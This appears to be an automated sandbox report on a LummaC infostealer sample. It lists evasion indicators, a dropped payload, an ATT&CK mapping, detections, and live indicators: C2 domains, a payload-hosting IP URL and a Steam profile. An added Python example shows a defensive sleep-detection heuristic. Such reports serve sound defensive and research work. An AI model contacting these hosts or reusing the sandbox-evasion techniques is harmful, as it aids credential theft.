Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (5 occurrences)
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX (50 occurrences)
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Window / User API: threadDelayed 506
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Window / User API: threadDelayed 9483
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-65669
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | API coverage: 5.1 %
Source: C:\Users\user\Desktop\AZCFTWko2q.exe TID: 2636 | Thread sleep count: 506 > 30
Source: C:\Users\user\Desktop\AZCFTWko2q.exe TID: 2636 | Thread sleep time: -365332s >= -30000s
Source: C:\Users\user\Desktop\AZCFTWko2q.exe TID: 2636 | Thread sleep count: 9483 > 30
Source: C:\Users\user\Desktop\AZCFTWko2q.exe TID: 2636 | Thread sleep time: -6846726s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe TID: 1240 | Thread sleep time: -90000s >= -30000s
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Last function: Thread delayed (2 occurrences)
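The "Thread sleep count: 506 > 30", "Thread sleep count: 9483 > 30" and "Thread sleep time ... >= -30000s" rows above come from a long-delay heuristic: a thread that calls a sleep API many times, or for a long cumulative period, is trying to outlast the sandbox's analysis window rather than do any work. The following Python is an added example, not part of the Joe Sandbox report, that applies the same two per-thread thresholds to a constructed API trace. The trace line format and the exact thresholds (more than 30 calls, or 30,000 ms in total) are assumptions on my part; the page shows only the comparisons, not the sandbox's log format.

```python
"""Added example, not part of the Joe Sandbox report: the long-delay heuristic
behind the 'Thread sleep count: N > 30' and 'Thread sleep time ... >= 30000'
rows, applied to a constructed API trace. The trace line format and both
thresholds are assumptions; the sandbox's own log format is not on the page."""
import re
from collections import defaultdict

# Assumed trace format: "tid=<n> <api>(<milliseconds>)", one call per line.
SLEEP_CALL = re.compile(r"tid=(?P<tid>\d+)\s+(?P<api>Sleep|SleepEx|NtDelayExecution)\((?P<ms>\d+)\)")
MAX_SLEEP_CALLS = 30          # assumption: calls per thread above which we flag
MAX_SLEEP_TOTAL_MS = 30_000   # assumption: cumulative delay at which we flag


def summarise_sleeps(trace_lines) -> dict:
    """Per-thread (call count, total milliseconds); lines that are not sleep calls are skipped."""
    stats = defaultdict(lambda: [0, 0])
    for line in trace_lines:
        m = SLEEP_CALL.search(line)
        if m:
            entry = stats[int(m["tid"])]
            entry[0] += 1
            entry[1] += int(m["ms"])
    return {tid: (calls, total) for tid, (calls, total) in stats.items()}


def flag_delayed_threads(trace_lines, max_calls=MAX_SLEEP_CALLS,
                         max_total_ms=MAX_SLEEP_TOTAL_MS) -> dict:
    """Map tid -> reason for every thread that trips either threshold."""
    flagged = {}
    for tid, (calls, total_ms) in summarise_sleeps(trace_lines).items():
        reasons = []
        if calls > max_calls:
            reasons.append(f"sleep count {calls} > {max_calls}")
        if total_ms >= max_total_ms:
            reasons.append(f"sleep time {total_ms}ms >= {max_total_ms}ms")
        if reasons:
            flagged[tid] = "; ".join(reasons)
    return flagged


# Constructed trace: thread 2636 sleeps 40 times for 722 ms (28,880 ms total, trips the
# count only), thread 1240 sleeps once for 90 s (trips the time only), thread 4100 is benign.
SAMPLE_TRACE = (
    ["tid=2636 Sleep(722)"] * 40
    + ["tid=1240 NtDelayExecution(90000)",
       "tid=4100 Sleep(10)",
       "tid=4100 CreateFileW(C:\\Users\\user\\x.txt)"]
)

if __name__ == "__main__":
    for tid, reason in flag_delayed_threads(SAMPLE_TRACE).items():
        print(f"thread {tid}: {reason}")
```

Many short sleeps and one long sleep are flagged separately on purpose: a sandbox that skips or shortens Sleep defeats the long single call, while the counted loop, paired with a clock read such as the GetSystemTimeAsFileTime decision node in the report, lets the sample notice that time did not actually pass.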
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_004389F2 FindFirstFileExW, 0_2_004389F2
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_024F8C59 FindFirstFileExW, 0_2_024F8C59
Source: Amcache.hve.7.dr | Binary or memory string: VMware
Source: Amcache.hve.7.dr | Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr | Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr | Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: Amcache.hve.7.dr | Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr | Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: AZCFTWko2q.exe, 00000000.00000002.3895670011.0000000000A76000.00000004.00000020.00020000.00000000.sdmp, AZCFTWko2q.exe, 00000000.00000002.3895670011.0000000000ACA000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640135258.0000000000959000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1595828887.000000000095C000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760231719.000000000095C000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000958000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640253542.000000000095A000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760118163.0000000000917000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.7.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: AZCFTWko2q.exe, 00000000.00000002.3895670011.0000000000ACA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW#
Source: Amcache.hve.7.dr | Binary or memory string: vmci.sys
Source: Amcache.hve.7.dr | Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr | Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.7.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr | Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr | Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.dr | Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.dr | Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.7.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 3_2_0043A9B0 LdrInitializeThunk, 3_2_0043A9B0
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0042A3D3
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0041EC5E
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_0042FE5F mov eax, dword ptr fs:[00000030h] 0_2_0042FE5F
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_00A398BB push dword ptr fs:[00000030h] 0_2_00A398BB
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_024F00C6 mov eax, dword ptr fs:[00000030h] 0_2_024F00C6
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_024C092B mov eax, dword ptr fs:[00000030h] 0_2_024C092B
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_024C0D90 mov eax, dword ptr fs:[00000030h] 0_2_024C0D90
Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 3_2_008D8B83 push dword ptr fs:[00000030h] 3_2_008D8B83
Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 3_2_024A092B mov eax, dword ptr fs:[00000030h] 3_2_024A092B
Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 3_2_024A0D90 mov eax, dword ptr fs:[00000030h] 3_2_024A0D90
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_0043BBC1 GetProcessHeap, 0_2_0043BBC1
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0042A3D3
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_004104D3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_004104D3
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_00410666 SetUnhandledExceptionFilter, 0_2_00410666
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_0040F911 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0040F911
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_024EA63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_024EA63A
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_024D073A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_024D073A
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_024CFB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_024CFB78
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_024D08CD SetUnhandledExceptionFilter, 0_2_024D08CD

HIPS / PFW / Operating System Protection Evasion

Source: 86DC.tmp.exe | String found in binary or memory: debonairnukk.xyz
Source: 86DC.tmp.exe | String found in binary or memory: diffuculttan.xyz
Source: 86DC.tmp.exe | String found in binary or memory: effecterectz.xyz
Source: 86DC.tmp.exe | String found in binary or memory: deafeninggeh.biz
Source: 86DC.tmp.exe | String found in binary or memory: immureprech.biz
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Process created: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe "C:\Users\user\AppData\Local\Temp\86DC.tmp.exe"
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_0041077B cpuid 0_2_0041077B
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 0_2_0043B00A
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: GetLocaleInfoW, 0_2_004351C0
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: EnumSystemLocalesW, 0_2_0043B2CD
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: EnumSystemLocalesW, 0_2_0043B282
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: EnumSystemLocalesW, 0_2_0043B368
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_0043B3F5
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: GetLocaleInfoW, 0_2_0043B645
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_0043B76E
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: GetLocaleInfoW, 0_2_0043B875
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_0043B942
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: EnumSystemLocalesW, 0_2_00434DCD
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 0_2_024FB271
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: EnumSystemLocalesW, 0_2_024F5034
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: GetLocaleInfoW, 0_2_024F5427
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: EnumSystemLocalesW, 0_2_024FB4E9
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: EnumSystemLocalesW, 0_2_024FB534
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: EnumSystemLocalesW, 0_2_024FB5CF
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: GetLocaleInfoW, 0_2_024FBADC
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_024FBBA9
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: GetLocaleInfoW, 0_2_024FB8AC
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: GetLocaleInfoW, 0_2_024FB8A3
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_024FB9D5
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_004103CD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_004103CD
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_004163EA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8, 0_2_004163EA
Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.7.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.7.dr | Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match | File source: 3.3.86DC.tmp.exe.2510000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.86DC.tmp.exe.2510000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.86DC.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.86DC.tmp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1549375881.0000000002510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match | File source: 3.3.86DC.tmp.exe.2510000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.3.86DC.tmp.exe.2510000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.86DC.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.86DC.tmp.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000003.1549375881.0000000002510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_004218CC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_004218CC
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_00420BF6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00420BF6
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_024E1B33 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_024E1B33
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_024E0E5D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_024E0E5D
                MITRE ATT&CK matrix, listed per tactic column (a leading number is the count the report shows beside that technique; techniques without a number are the unmatched cells of the matrix):

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                Execution: 2 Native API; 1 PowerShell; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Defense Evasion: 1 Masquerading; 1 Virtualization/Sandbox Evasion; 11 Process Injection; 11 Deobfuscate/Decode Files or Information; 4 Obfuscated Files or Information; 22 Software Packing; 1 DLL Side-Loading; Indicator Removal from Tools
                Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                Discovery: 1 System Time Discovery; 1 Query Registry; 131 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 1 Process Discovery; 1 Application Window Discovery; 2 File and Directory Discovery; 24 System Information Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                Collection: 1 Screen Capture; 1 Archive Collected Data; 3 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                Command and Control: 11 Encrypted Channel; 12 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 124 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
                Behavior Graph ID: 1575332 | Sample: AZCFTWko2q.exe | Startdate: 15/12/2024 | Architecture: WINDOWS | Score: 100

                Top-level DNS/IP nodes: effecterectz.xyz; diffuculttan.xyz; 8 other IPs or domains
                Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures; Performs DNS queries to domains with low reputation (attached to the diffuculttan.xyz node)

                Process tree (the two counters after a process name are the graph's created-registry-values and created-files counts):
                • AZCFTWko2q.exe (started; counters 1, 17)
                  DNS/IP: 176.113.115.19, 49706, 80, SELECTELRU, Russian Federation; post-to-me.com 104.21.56.70, 443, 49705, CLOUDFLARENETUS, United States
                  Dropped files: C:\Users\user\AppData\Local\...\86DC.tmp.exe (PE32); C:\Users\user\...\ScreenUpdateSync[1].exe (PE32)
                  Signatures: Detected unpacking (overwrites its own PE header)
                  • 86DC.tmp.exe (started by AZCFTWko2q.exe)
                    DNS/IP: deafeninggeh.biz 104.21.16.1, 443, 49708, CLOUDFLARENETUS, United States; immureprech.biz 172.67.207.38, 443, 49707, CLOUDFLARENETUS, United States; steamcommunity.com 23.55.153.106, 443, 49711, AKAMAI-ASN1EU, United States
                    Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); 2 other signatures
                    • WerFault.exe (started by 86DC.tmp.exe; counters 19, 16)
                      Dropped files: C:\ProgramData\Microsoft\...\Report.wer (Unicode)

                Source | Detection | Scanner | Label
                AZCFTWko2q.exe | 56% | Virustotal
                AZCFTWko2q.exe | 55% | ReversingLabs | Win32.Exploit.LummaC
                AZCFTWko2q.exe | 100% | Avira | HEUR/AGEN.1312567
                AZCFTWko2q.exe | 100% | Joe Sandbox ML
                Source | Detection | Scanner | Label
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe | 100% | Avira | HEUR/AGEN.1312567
                C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | 100% | Avira | HEUR/AGEN.1312567
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe | 100% | Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | 100% | Joe Sandbox ML
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe | 62% | ReversingLabs | Win32.Trojan.LummaC
                C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | 62% | ReversingLabs | Win32.Trojan.LummaC
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label
                https://wrathful-jammy.cyou/2 | 100% | Avira URL Cloud | malware
                https://deafeninggeh.biz/apio | 100% | Avira URL Cloud | malware
                http://176.113.115.19/ScreenUpdateSync.exe.- | 0% | Avira URL Cloud | safe
                https://sordid-snaked.cyou/apims | 100% | Avira URL Cloud | malware
                https://wrathful-jammy.cyou/pi | 100% | Avira URL Cloud | malware
                http://176.113.115.19/ScreenUpdateSync.exeiD | 0% | Avira URL Cloud | safe
                https://deafeninggeh.biz/i | 100% | Avira URL Cloud | malware
                https://post-to-me.com/Ds | 100% | Avira URL Cloud | malware
                Name | IP | Active | Malicious | Reputation (the Antivirus Detection column is empty for every row)
                post-to-me.com | 104.21.56.70 | true | false | high
                steamcommunity.com | 23.55.153.106 | true | false | high
                immureprech.biz | 172.67.207.38 | true | false | high
                deafeninggeh.biz | 104.21.16.1 | true | false | high
                sordid-snaked.cyou | unknown | unknown | false | high
                diffuculttan.xyz | unknown | unknown | false | high
                effecterectz.xyz | unknown | unknown | false | high
                awake-weaves.cyou | unknown | unknown | false | high
                wrathful-jammy.cyou | unknown | unknown | false | high
                debonairnukk.xyz | unknown | unknown | false | high
                Name | Malicious | Reputation (the Antivirus Detection column is empty for every row)
                sordid-snaked.cyou | false | high
                deafeninggeh.biz | false | high
                effecterectz.xyz | false | high
                wrathful-jammy.cyou | false | high
                https://steamcommunity.com/profiles/76561199724331900 | false | high
                awake-weaves.cyou | false | high
                immureprech.biz | false | high
                https://immureprech.biz/api | false | high
                debonairnukk.xyz | false | high
                diffuculttan.xyz | false | high
                https://post-to-me.com/track_prt.php?sub=0&cc=DE | false | high
                                                                                                                                      high
                                                                                                                                      https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://post-to-me.com/track_prt.php?sub=AZCFTWko2q.exefalse
                                                                                                                                          high
                                                                                                                                          https://wrathful-jammy.cyou/286DC.tmp.exe, 00000003.00000003.1640135258.0000000000959000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760231719.000000000095C000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000958000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640253542.000000000095A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                          unknown
                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://www.google.com/recaptcha/86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://checkout.steampowered.com/86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://post-to-me.com/AZCFTWko2q.exe, 00000000.00000002.3895670011.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://store.steampowered.com/;86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://store.steampowered.com/about/86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://steamcommunity.com/my/wishlist/86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
